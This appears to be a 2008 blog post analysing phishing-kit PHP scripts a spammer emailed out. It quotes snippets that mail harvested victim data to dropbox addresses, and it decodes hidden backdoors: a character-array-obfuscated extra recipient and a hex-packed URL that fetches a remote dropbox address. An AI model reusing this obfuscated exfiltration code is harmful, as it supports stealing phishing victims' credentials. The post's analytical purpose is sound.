2008-06-04
Sometimes spammers / scammers are so stu ...
Sometimes spammers / scammers are so stupid it is amusing again. I just received several mails with the php-source for the result-collecting and mailing script for the phishing site. Interesting code snippets:mail("dongmopascal@gmail.com",$subject,$message,$headers);But, the scammer gets scammed too. Look at this code snippet:$ar=array("0"=>"m","1"=>"i","2"=>"e","3"=>"r","4"=>"d","5"=>"a","6"=>"0", "7"=>"0","8"=>"@","9"=>"h","10"=>"o","11"=>"t","12"=>"m","13"=>"a","14"=>"i", "15"=>"l.es"); $to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['7']. $ar['8'].$ar['9'].$ar['10'].$ar['11'].$ar['12'].$ar['13'].$ar['14'].$ar['15']; mail($to,$subject,$message,$headers);Takes a bit of decoding, but it seems copies are sent to mierda008@hotmail.es.
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address://This is your email $to = "savepam@gmail.com" ; // Write your emailBut in the next lines.../* EnD Configuration */ $victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870"); $DetailsIP = file_get_contents($victimIP, "r"); $DetailsIP = pack("H*", $DetailsIP);$victimip unpacks to http://freescams.3x.ro/email.php so the scammer of the scammer can 'maintain' this and change dropbox if needed. Currently that shows a page which I think says that the page does not exist. The result would be used in the code:$arr=array($to, $DetailsIP); foreach ($arr as $to){mail($to, $subj, $msg, $from);} header("Location: done.html?cmd=_login-run");You can't trust a good scammer these days, it seems...